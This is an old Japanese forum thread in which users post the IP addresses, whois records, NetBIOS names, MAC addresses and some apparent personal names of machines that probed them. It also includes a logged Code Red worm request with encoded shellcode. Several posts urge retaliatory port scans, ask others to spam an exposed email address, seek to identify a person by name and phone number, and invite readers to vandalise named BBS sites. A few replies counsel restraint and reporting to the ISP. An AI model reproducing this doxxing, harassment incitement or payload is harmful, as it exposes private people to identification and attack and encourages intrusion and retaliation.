不正アクセスしてきた奴のIPを晒すスレ

以下の通りです。IPドメインサーチも使ってホストも調べました。
202.229.41.147

InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-156 [サブアロケーション] 202.229.41.0
株式会社オーバーワークス (OVERWORKS LTD.)
OVERWORKS [202.229.41.128 <-> 202.229.41.159] 202.229.41.128/27

皆さんも不正アクセスして来たヤツのIPを晒して下さい！

　　　　　　　　　　　　　　　　　　　終了
　　　　　　　　　
　　　　　　　　　　　　　　　　　　　　　　
　 　

>>1
どうせパーソナルファイアウォールにでも引っかかっただけなんだろな
氏ねｳﾞｫｹ

いいんじゃねーの？こうゆうスレがあっても。
どうせならそのIPにポートスキャンかまそうＺＥ！！！！！！（藁

アタック報告スレを猿みたいに乱立すんじゃねーよ氏ね
http://ton.2ch.net/test/read.cgi?bbs=sec&key=989865357
http://ton.2ch.net/test/read.cgi?bbs=sec&key=993096334

>>4
1発見！放置をよろしくお願いします

オープンコンピュータネットワーク (Open Computer Network)
SUBA-131-320 [サブアロケーション] 210.160.70.0
株式会社システムビジョン (System Vision Co.,Ltd.)
SV-SYSTEM [210.160.70.64 <-> 210.160.70.79] 210.160.70.64/28

ポート111にアクセスしてきやがった

>>5
そっちに書き込んできます。スレ乱立させて済みません。
>>6
俺じゃないんですけど。

ageんなﾎﾞｹ！！

■■■■■■■■■　終了　■■■■■■■■■

http://www.cgigame.com/bbs/raiv.html
荒らし専用

当方、CATV LANですが、最近、ネットに繋いでないのに、TAのランプが点滅しっぱなしなんです。
フリーのファイヤーウオールとか言うのをインストールしてみたんです。
そしたら、
Someone on address ibrk0610.ppp.infoweb.ne.jp [210.131.80.122] wants to send ICMP packet to your machine
tcpip kernel driver
こんな警告が頻繁に出るんですが、私には何のことかわかりません。
どなたか教えてください。

>>11
ageんな氏ね

210.243.249.5の調査結果(apnic)[whois.apnic.net]

% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois6.apnic.net)

inetnum: 210.243.128.0 - 210.243.255.255
netname: SEEDNET
descr: Digital United Inc.
descr: 9F, No. 125, Song Jiang Road
descr: Taipei, Taiwan
country: TW
admin-c: CY74-AP
tech-c: CY74-AP
mnt-by: MAINT-TWNIC-NS
changed: [email protected] 20000113
source: APNIC

person: Chyi-Chuan Yang
address: Digital United Inc.
address: 9F, No. 125, Song Jiang Road
address: Taipei, Taiwan
country: TW
phone: +886 2 2739 0900
fax-no: +886 2 2739 7512
e-mail: [email protected]
nic-hdl: CY74-AP
mnt-by: TWNIC-AP
changed: [email protected] 20000113
source: APNIC

IP: 210.130.223.228
DNS: h228.p223.iij4u.or.jp

sine

>>1
不正アクセスしてるかどうかってどうやって調べるのですか？
マジレスお願いします｡

ﾜﾗﾀ
俺からもお願い。

IP: 203.69.5.162
Node: PUBLISHER
Group: EHANISM
NetBIOS: WHOCHM 
MAC: 0001027363B7

>>16
ファイアウォールソフトをインストールして、ソフトのログを見れば
判るよ。
ノートン・インターネットセキュリティがお勧め。

A H O

61.24.91.82

↑こいつまじでうざいよ。
ログにひっかかってた

しかも何回も何回も

IP: 210.24.209.65
DNS: adsl65.dyn209.pacific.net.sg

IP: 203.146.91.14
Node: PHCPL
Group: PHCPL.COM
NetBIOS: PHCPL j
MAC: 00036D1FF84F

IP: 202.233.229.43
DNS: nttoska06043.ppp.infoweb.ne.jp
しつこい　しつこい

IP: 211.105.119.197
Node: CHUM1
Group: WORKGROUP
NetBIOS: ｱ<C7>
MAC: 005038107486

うぜ〜よ

IP: 24.19.62.77
DNS: c1240355-a.aurora1.co.home.com

ここは踏み台博覧会デスか？

ただの公開オナニースレかと

IP: 210.136.161.103
2001年07月16日(月) 13時41分

ｉモードです（Ｄ５０２ｉ）
レンタルメアド晒してたので、
ばらまいたりして遊んでやってください

IP: 210.178.232.70
Node: WWW
NetBIOS: ﾁﾟｱｳｹｫｽﾇ
Group: ﾁﾟｱｳｹｫｽﾇ

＞２７
串？みたいなアドレスだな。

[210.230.164.137]
この侵入者に関する詳細はわかっていません。

TCP Data changed(危険度指数80以上）
の攻撃を仕掛けてきた奴

IP: 24.78.70.222
Node: 柴崎雄志
Group: 無し
NetBIOS: 柴崎 雄志 
MAC: 002078103F47
DNS: h24-78-70-222.vc.shawcable.net

インターネットには４２億の愛があるんだね

＞＞３３氏。調べてきた。
あなたが検索されたアドレス［ 210.230.164.137 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.230.164.0-210.230.167.0
b. [ネットワーク名] JSDI-NET
f. [組織名] JSDインターネットサービス(日本システムディベロップメント株式会社)
g. [Organization] JSD Internet Service(Japan System Development Co.,Ltd)
m. [運用責任者] MA091JP
n. [技術連絡担当者] MA091JP
p. [ネームサーバ] ns.jsdi.or.jp
p. [ネームサーバ] ns.ipro.ad.jp
p. [ネームサーバ] stl.nolf.co.jp
p. [ネームサーバ] dns1.dion.ne.jp
y. [通知アドレス] [email protected]
[割当年月日] 1998/08/24
[返却年月日]
[最終更新] 2001/02/12 17:23:45 (JST)
[email protected]

つうかよ、中にはルータの設定を間違えて不正アクセスしてきたみたいな形になったのもいるから、
よほど悪質でない限りほっといたれよ。
かくいう俺は、設定ミスでFirewallのアラーム80連発…。
全てすぷ〜ふぃんぐ。さて、俺はどんな間違いをしたでしょう。

2001-07-17 11:42:55 GMT
By 210.230.164.137 ()
Attack #2000320: TCP data changed
Port information: len=18&old=tcp_disconnect_one&new=TCPS_LISTEN-TH_ACK
Attack count: 3
Attack result: Blocked

2001-07-17 12:27:08 GMT
By 152.94.60.66 (INFOPC2 )
Attack #2003102: TCP port probe
Port information: port=6699&reason=Firewalled
Attack count: 1044
Attack result: Blocked
Attacker's DNS Name: INFOPC2
Attacker's NETBios Name: LASSE 
Attacker's MAC Address: 000102A36938
Attacker's Machine Name: INFOPC2
Attacker's Group: SAMSKIPNADEN


もう1000回以上連打してる

ageてやる意味あるのかよこのスレ

>>40
糞レス付けるな

糞スレ上げんな

糞レス付けんな　だって（ﾌﾟ

糞スレ上げんな だって(ﾌﾟ

sageのパソコン初心者夏厨が孤軍奮闘中！

(210.189.72.101) (TCP Port 16411)

あ、間違えた。
(12.28.142.251) (TCP Port 16411)

210.81.74.100 (TCP Port 3237)

(TCP Port 111) from 64.81.234.187 (TCP Port 2262) [TCP Flags: S].

dns03.fetnet.net (210.241.192.191) (HTTP) from your computer [TCP Flags: S].
(DNS) from 210.45.96.1 (UDP Port 4203).

http://www.trinity-ac.com/

------------------終了------------------

The firewall has blocked Internet access to your computer (TCP Port 111) from 210.101.105.16 (TCP Port 4340) [TCP Flags: S].

PFW夏厨が増殖しています。

The firewall has blocked Internet access to your computer (TCP Port 111) from 198.93.97.132 (TCP Port 4340) [TCP Flags: S].

The firewall has blocked Internet access to your computer (TCP Port 111) from 209.150.232.18 (TCP Port 4340) [TCP Flags: S].

209.67.50.203

The firewall has blocked Internet access to your computer (TCP Port 111) from 131.128.149.244 (TCP Port 1516) [TCP Flags: S].

The firewall has blocked Internet access to your computer (DNS) from 131.128.149.244 (TCP Port 2613) [TCP Flags: S].

The firewall has blocked Internet access to your computer (TCP Port 111) from 62.70.3.233 (TCP Port 1516) [TCP Flags: S].

TCP Port 111) from 210.101.105.16 (TCP Port 4340) [TCP Flags: S].

(HTTP) from 211.17.174.51 (TCP Port 1332) [TCP Flags: S].

(HTTP) from 62.24.69.72 (TCP Port 4832) [TCP Flags: S].

(HTTP) from 131.94.59.80 (TCP Port 4616) [TCP Flags: S].

(HTTP) from 211.60.56.149 (TCP Port 3250) [TCP Flags: S].

(HTTP) from 12.8.15.75 (TCP Port 2206) [TCP Flags: S]

(HTTP) from 64.192.113.217 (TCP Port 1881) [TCP Flags: S].

(HTTP) from 200.18.136.38 (TCP Port 1516) [TCP Flags: S].

212.6.187.198

同じISPの奴に侵入されました。
自分で調べた結果が以下の通りです。
なんとか個人名特定出来ないでしょうか？
どなたかスキルのある方、是非ご教授下さいませ。

211.8.49.116
熊本ケーブルネットワーク株式会社 (Kumamoto Cable Network Corporation)
KCNET [211.8.49.0 <-> 211.8.49.127] 211.8.49.0/25
オープンデータネットワーク (Open Data Network)
SUBA-150-F89 [サブアロケーション] 211.8.49.0
. [Domain Name] KCN-TV.NE.JP
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.8.49.0/25
b. [ネットワーク名] KCNET
f. [組織名] 熊本ケーブルネットワーク株式会社
g. [Organization] Kumamoto Cable Network Corporation
m. [運用責任者] TM504JP
n. [技術連絡担当者] TM504JP
y. [通知アドレス] [email protected]
[割当年月日] 2000/04/06
[返却年月日]
[最終更新] 2000/04/07 11:13:46 (JST)
[email protected]

>>69
ケーブルだし、IPは固定されてるかな？
だとしたら色々と手段があると思うけど。

でも、個人特定する事にあまりメリットはないと思うよ。
その後の行動次第ではあなた自身がK察のご用になりますので。

それより何されたの？過剰に反応して事を大きくしないようにね。

これでfwがポートスキャンをblockしただけなら藁えるな

>>70
レスありがとうございました。
先ず個人特定をしたい理由から話します。
私は、そのクラッキングを試みてきた人がISPの管理者では？とふんでいるからです。
そう思うに至る理由は少し複雑で話すわけにはいきませんが、
別に私が法に触れる事をして恐れている訳ではありません。
メリットの話ですが、仮に侵入者が個人だったとした場合は良いのです。（良くはないかな？）
個人名を晒したりする気はありません。
只、電話番号が解れば個人的に電話して「もうしないでくれ！」と注意するくらいです。
>>71
すいません。無知でポートスキャンが解りません（苦笑）
でも、空気でなんとなく間抜けなことなんだって解ります。
その時は笑って下さい（笑）

>>72
恐らくログがあると思うから、それを貼ってもらえると有り難いかも。
何されてるか判断つかないうちは行動するのは避けた方がいいと思うよ。
なんか訳アリっぽいけれど何度も繰り返されるなら、
ISPにメール送ってみて反応なければK察でも行くといいと思うよ。

漏れは専らfwに反応するような事より
さっき殺し逃がしたゴキブリの方がよほど怖い（藁

＞＞７３
（笑い

>>69
勝手に犯人扱いしたらいかんよ。キミのいう侵入の度合も知らんし。
っていうかインターネットに繋がないで下さい。迷惑なんで（笑

>>75
同意。
個人のマシン踏み台にするなんてことは
俺はないぞ。
0.0.0.0から順番に流してるだけだ。
その１台にしかすぎん。

age

だあれ　だれなのさ。
.kdn.co.jp

全て逝ってよし。

61.182.252.151
65.6.233.134
65.6.166.84
200.204.67.14
65.101.132.250
216.10.172.109
137.229.134.195
4.54.220.114
212.187.220.143
24.3.215.171
207.127.12.254
211.22.135.55
213.122.137.112
211.41.23.128
195.97.133.54
195.184.53.90
12.98.204.125
12.111.64.7
212.154.65.2
38.139.17.161
208.196.59.14
194.134.196.134

203.165.0.241

202.101.228.112

日付: 2001/07/22 時刻: 23:20:23
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 202.39.129.199,sunrpc

IP: 64.90.46.27
DNS: mmarshal27.august.net

日付: 2001/07/23 時刻: 0:37:06
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 64.90.46.27,sunrpc

IP: 203.155.206.150
Node: 7MAHARAJ
NetBIOS: MYGROUP
Group: MYGROUP

The firewall has blocked Internet access to your computer (FTP) from 213.219.64.165 (TCP Port 2855) [TCP Flags: S].

IP: 203.182.164.151
DNS: csc6-531.tokyo.mbn.or.jp
Node: AIKO
Group: DEFAULT_WG
NetBIOS:
__MSBROWSE__

MAC: 444553547777

この１時間の間に150回

IP: 210.138.229.55
Node: K-MFTR1WZ4XZ9SJ
Group: WORKGROUP
MAC: 444553547777
DNS: h055.p997.iij4u.or.jp

うちにも来ました。

>>87
プロバイダにメール送れ

216.35.217.210

192.168.1.1

上の２個所からなんだがIPドメインサーチってどうやればいいの？

The firewall has blocked Internet access to your computer
(TCP Port 111) from 211.248.167.188 (TCP Port 3229)
[TCP Flags: S].
Time: 2001/07/24 0:41:08

The firewall has blocked Internet access to your computer (TCP Port 111)
from 211.115.216.90 (TCP Port 2030) [TCP Flags: S].
Time: 2001/07/24 1:40:02

The firewall has blocked Internet access to your computer (TCP Port 6699)
from 210.136.122.178 (TCP Port 16229) [TCP Flags: S]

The firewall has blocked Internet access to your computer (TCP Port 6699)
from 65.1.104.98 (TCP Port 4271) [TCP Flags: S].

The firewall has blocked Internet access to your computer (TCP Port 6699)
from 24.157.104.245 (TCP Port 1939) [TCP Flags: S].

不正アクセスの多いドメインって言ったら
t-dialin.net
でしょう。

Apacheのログ。

user-vcaumjq.dsl.mindspring.com - - [23/Jul/2001:23:33:48 +0900] "GET /default.ida?NNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 331

>97
その話は過去ログみれ。
終了しとる。

最近流行っているのかｺﾞﾙｧ

63.113.124.101 - - [20/Jul/2001:03:11:55 +0900] "GET /default.ida? HTTP/1.0" 400 3
28
211.234.53.230 - - [20/Jul/2001:03:34:09 +0900] "GET /default.ida? HTTP/1.0" 400 3
28
client50240.atl.mediaone.net - - [20/Jul/2001:03:39:30 +0900] "GET /default.ida? H
TTP/1.0" 400 328
206.31.84.43 - - [20/Jul/2001:04:11:45 +0900] "GET /default.ida? HTTP/1.0" 400 328
194.234.88.77 - - [20/Jul/2001:04:20:28 +0900] "GET /default.ida? HTTP/1.0" 400 32
8
c264815-a.stcla1.sfba.home.com - - [20/Jul/2001:04:28:04 +0900] "GET /default.ida?
HTTP/1.0" 400 328
63.82.147.181 - - [20/Jul/2001:04:54:48 +0900] "GET /default.ida? HTTP/1.0" 400 32
8
148.196.1.26 - - [20/Jul/2001:04:59:34 +0900] "GET /default.ida? HTTP/1.0" 400 328
dsl-216-227-18-53.telocity.com - - [20/Jul/2001:05:22:00 +0900] "GET /default.ida?
HTTP/1.0" 400 328
www.rochester.k12.mn.us - - [20/Jul/2001:06:22:50 +0900] "GET /default.ida HTTP/1
.0" 400 328
195.143.196.116 - - [20/Jul/2001:06:46:10 +0900] "GET /default.ida? HTTP/1.0" 400
328
mail.paturnpike.com - - [20/Jul/2001:06:51:55 +0900] "GET /default.ida? HTTP/1.0"
400 328
aphilipov.ne.mediaone.net - - [20/Jul/2001:07:10:38 +0900] "GET /default.ida? HTTP
/1.0" 400 328
208.176.33.213 - - [20/Jul/2001:07:57:22 +0900] "GET /default.ida HTTP/1.0" 400 3
28
63.220.74.2 - - [20/Jul/2001:08:13:35 +0900] "GET /default.ida HTTP/1.0" 400 328
w068.z064001196.pdx-or.dsl.cnc.net - - [20/Jul/2001:08:36:39 +0900] "GET /default.ida HTTP/1.0" 400 328

>>98
ｽﾏｿ

IP: 24.165.27.123
Node: DORAN-IY7OD9BK0
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0003477C70C3
DNS: 24-165-27-123.san.rr.com
ｺﾞﾙｧ!

IP: 24.165.27.123
Node: DORAN-IY7OD9BK0
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0003477C70C3
DNS: 24-165-27-123.san.rr.com

IP: 216.138.165.17
Node: COMPUTER
Group: WORKGROUP
MAC: 00207800787C

IP: 211.10.26.123
DNS: adcore1.adcorejapan.co.jp

IP: 216.138.165.17
Node: COMPUTER
Group: WORKGROUP
MAC: 00207800787C

IP: 210.223.125.35
Node: 35
Group: WORKGROUP
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00E0296A52E9

＞＞99
default.ida の話は終了
http://www.cert.org/advisories/CA-2001-19.html
分からず屋が多いので再度ながしちゃる、ありがたく受け取れ。
2chのおかげで助かったｵﾚ

>>103
次からdefault.idaを持ち出すのは自己顕示欲の強い
中国人と言うことでよろしいか？

なして判るアルカ。

過去ログ読めないからアル。

ｵﾚﾉｺﾄじゃﾅｶﾀあるか。ｽﾏｿ。

192.168.0.6

こいつが毎日アタックしてきます。
オイラの斜向かいに座っているんですが、
ぶん殴ってもいいですか？

32歳の女上司がオイラに毎日アタックしてきます。
そろそろコネクトしてもいいですか？

>>106
そんなはずないよ。気にせず逝こうよ。

>>108
ひっそりとping連発で我慢しましょう。

>>109
社内恋愛規制中
焦って、人生を棒に振らないように。

>>103
ｻﾝｸｽｺ

IP: 24.124.28.43
DNS: dv043s28.lawrence.ks.us

ちょっかいかけてくるアドレスの機械を調べるとセキュリティーが甘いところが多い。
直に来る馬鹿はそういないと言うことか。

Reverse DNS Lookup of 212.126.200.208
The computer name ("domain name") identified for this IP address is:

keyworkgate.planNET.de

IP: 200.65.7.215
Node: IBALPEMX
NetBIOS: MYGROUP
Group: MYGROUP
DNS: dup-200-65-7-215.prodigy.net.mx

>>113
同感、逆にスキャンしてやるとポート開きまくってるよね。

自宅から自分の会社をスキャンしたらすごい事になってた・・・
鬱だ

たった今なんだけど、なんかコエー
宗教？
Jul 25 23:23:27 TCP: ftp connection attempt from saudi-passports.gov.sa (216.147.100.83):38615
Jul 25 23:23:27 TCP: telnet connection attempt from saudi-passports.gov.sa (216.147.100.83):42049
Jul 25 23:23:27 TCP: https connection attempt from saudi-passports.gov.sa (216.147.100.83):13635

なんだよ、宗教じゃねぇじゃん
勧誘されるのかと思ったよ

でも、gov.からのアクセスは少し嬉しいです
どんどん出していってくださいね

216.99.207.68
206.107.237.26

24.131.128.11

setsuzoku-ppp-210-253-114-52.interq.or.jp

　

IP: 61.220.46.61
Node: ｾﾔｺ<F8>ｪAｾｹ
Group:
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0050BA1DE628
DNS: 61-220-46-61.HINET-IP.hinet.net

IP: 203.70.133.250
Node: WWW-WGFOBFFQTXC
Group: WORKGROUP
NetBIOS: ADMINISTRATOR
MAC: 0050FC310BA7

IP: 24.187.232.198
DNS: ool-18bbe8c6.dyn.optonline.net

IP: 211.127.242.144
Node: YUYA
DNS: c144.om.cablenet.ne.jp
Group: WATANABE F
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 00909911B2FC

IP: 213.237.38.35
DNS: 213.237.38.35.adsl.sg.worldonline.dk
Node: LENNART-Z2F1HNY
Group: HJEMME
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0080AD50A6C8

IP: 24.202.250.131
DNS: modemcable131.250-202-24.mtl.mc.videotron.ca
Node: JONATHAN
Group: WORKGROUP
MAC: 00E0297E88D7

IP: 142.165.77.148
DNS: hsdb-regn-77-148.sasknet.sk.ca
Node: OEMCOMPUTER
Group: OEMWORKGROUP
NetBIOS: SHEA
MAC: 0050FC1B748E

IP: 217.226.255.128
Node: WAREZ-SERVER
Group: ARBEITSGRUPPE
MAC: 005345000000
DNS: pD9E2FF80.dip.t-dialin.net

Anonymyserで来ている奴のIPの抜き方ってありますか？

あるけど？

>>127
お願いします、教えて下さい。
謝礼は抜いた荒らしのIPで。（藁

ハックする気ないしIPもらっても・・・（蓑
http以外、ftp、telnetとかで別セッションを確立する。
アノニにログ提供を促す、リモホがアノニの時に拒否するとか。

192.168.2.129
毎晩ご苦労様です

>>122って誰か分かる？？
よかったらどうぞ・・・。（藁

>>131
激しく同意！

>>131　>>132
ＩＰドメインＳＥＡＣＨで調べてみたが･･･


Domain Information: [ドメイン情報]
a. [ドメイン名] INTERQ.OR.JP
e. [そしきめい]
f. [組織名] interQ (インターキュー株式会社)
g. [Organization] InterQ
k. [組織種別] 個人を対象とする通信サービス
l. [Organization Type] Internet connection service provider
m. [登録担当者] TW184JP
n. [技術連絡担当者] KY642JP
p. [ネームサーバ] dns.interq.or.jp
p. [ネームサーバ] dns1.interq.or.jp
p. [ネームサーバ] dns2.interq.or.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1995/11/30
[接続年月日] 1995/12/14
[最終更新] 2001/02/28 17:21:50 (JST)
[email protected]

スキルの無い俺にはこれくらいしかわからんな。
誰か他に調べてもらってくれ〜。
ﾁｮﾄ興味あり

>>134
氏ねよｳﾞｫｹ、ｱﾊﾊﾊﾊ

>>122 = >>131-134

ど阿呆

>>ハックする気ないしIPもらっても・・・（蓑
ネタだったらおれの完パイ

IP: 211.6.251.146
DNS: takonet.ikazaki.ne.jp

Domain Information: [ドメイン情報]
a. [ドメイン名] CCN.NE.JP
b. [ねっとわーくさーびすめい]
c. [ネットワークサービス名] CCN
d. [Network Service Name] CCN
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] KH748JP
n. [技術連絡担当者] TH816JP
p. [ネームサーバ] ns1.ccn.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス] [email protected]
[状態] Connected (2002/03/31)
[登録年月日] 1998/01/23
[接続年月日] 1998/12/14
[最終更新] 2000/09/27 11:46:02 (JST)
[email protected]

Non-authoritative answer:
Name: medusa.ccn.ne.jp
Address: 210.146.48.66

>>139
荒らしなんですけど誰か懲らしめてやってください

・ポートスキャンしてきた相手のIP晒し
・アタック依頼

ほんとにクソスレだね

The firewall has blocked Internet access to your computer (TCP Port 111) from 203.184.152.235 (TCP Port 2344) [TCP Flags: S].

fvcb

ちょっと前、自分の家のマスィーンの IP が分からず
当てずっぽうで片っ端から ssh を試みたことがあったが、
そういうのもここに晒されるのか

>>144
あらゆるログが晒されます。

おまけにドメイン情報も貼り付けられます。
怖いですねぇ〜。

何で自分のマシンのIPがわからんねん（笑
どないなっとんじゃ、そのマシン、謎

>>147
彼のマスィーンはドリキャスだからです。

203.87.4.20

210.159.229.148

IP: 216.65.161.211
DNS: ppp-161.211.triton.net

IP: 211.124.242.252
Node: PCG-XR_F SERIES
DNS: zaqd37cf2fc.zaq.ne.jp
Group: WORKGROUP
NetBIOS: VAIO
MAC: 004026922077

ロリ画像大量保有者

あげ

The firewall has blocked Internet access to your computer
(FTP) from 137.78.99.105 (FTP Data) [TCP Flags: S].

NASA.GOV？

やたら、韓国から来るんだけど…。
ポートスキャン？
って、どうやって判断すればいいの？

ポートスキャンを調べれば分かる。

できれば、どうやって調べるのか教えて下さい。
あと、フリーのソフト使ってるんですが、安全性とかは、市販のものに
比べてどうなんでしょうか？すいません。お願いします。

http://www.google.co.jp/search?hl=ja&safe=off&q=%83%7C%81%5B%83g%83X%83L%83%83%83%93%81@%8Ed%91g%82%DD&lr=
これでもそこそこの知識はつくはず。

fwは種類によって差が出るから。一概には言えない。
フリーと普通のお店にある市販ならあまり差はない。

ありがとうございました。参考にさせていただきます。

210.167.246.35
朝一から御苦労様で。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 150.43.0.0
b. [ネットワーク名] FITNES
f. [組織名] 福岡工業大学
g. [Organization] Fukuoka Institute of Technology
m. [運用責任者] BN021JP
n. [技術連絡担当者] SO004JP
n. [技術連絡担当者] YN009JP
n. [技術連絡担当者] RN003JP
n. [技術連絡担当者] YY031JP
p. [ネームサーバ] fitwide-gw.fit.ac.jp
p. [ネームサーバ] yamakasa.fit.ac.jp
y. [通知アドレス]
[割当年月日]
[返却年月日]
[最終更新] 2001/05/29 13:44:11 (JST)
[email protected]

210.174.27.1

http://cocoa.2ch.net/test/read.cgi?bbs=ad&key=996107527&st=7&to=7&nofirst=true

[email protected] relay=[65.160.45.211]
[email protected]=[65.160.45.211]
[email protected] relay=cad3109404-b.crlspr1.fl.home.com [65.14.115.74]

193.253.202.109
100回以上アクセスしたという記録が残っていた・・・

[5] Tue 31Jul01 02:21:18 - (000001) Connected to 210.149.142.69 (Local address ***.***.***.**)
[5] Tue 31Jul01 02:21:19 - (000001) IP-Name: H142-069.TOKYU-NET.CATV.NE.JP
[5] Tue 31Jul01 02:21:24 - (000001) ANONYMOUS logged in, password: [email protected]

ここまでしか分からん・・・東京人ということは分かったが・・鬱。だれか分かる奴いんのか？

pfa4c9c.iwakpc00.ap.so-net.ne.jp
これはどこ？

福島県のいわきでしょう

sendmail: NOQUEUE: Null connection from sdn-ar-002flflauP228.dialsprint.net [168.191.76.244]

>>166
anonymous ftp？
閉じとけば。

・・・・・・挑戦状・・・・・・
君たちの力を知りたい。
自分の力に自身のある輩は、
http://www.lain.ais.ne.jp/~fan/rire/rabu/story.cgi
か、http://www.lain.ais.ne.jp/~fan/spbbs/cbbs.cgi
を思う存分荒らしてくれ給え。

IP: 61.220.46.61
Node: ｾﾔｺ<F8>ｪAｾｹ
Group:
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 0050BA1DE628
DNS: 61-220-46-61.HINET-IP.hinet.net

IP: 61.124.212.208
Node: FUKUYAMA
Group: YOSHIHITO
MAC: 444553547777
DNS: nttaich018208.flets.ppp.infoweb.ne.jp

IP: 61.207.79.36
Node: GP-02A
Group: FILLIN
NetBIOS: <0102>__MSBROWSE__<02>
MAC: 444553547777
DNS: p5036-ipad01funabasi.chiba.ocn.ne.jp

(ﾟдﾟ)夏厨ｳｻﾞｰ
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:11:51:55 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:12:14 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:13:11 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:15:25 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:17:03 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:19:03 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:21:01 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:22:50 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:31:34 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:32:15 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:33:48 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:37:58 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:12:38:46 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:30:27 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:31:10 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:31:58 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:35:26 +0900] "GET /_vti_inf.html HTTP/1.1" "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:36:12 +0900] "GET /_vti_inf.html HTTP/1.1" 200 6649 "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:37:11 +0900] "GET /_vti_inf.html HTTP/1.1" 200 6649 "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
p24-dn03shinguu.wakayama.ocn.ne.jp - - [30/Jul/2001:13:38:41 +0900] "GET /_vti_inf.html HTTP/1.1" 200 6649 "-" "Mozilla/2.0 (compatible; MS FrontPage 4.0)"
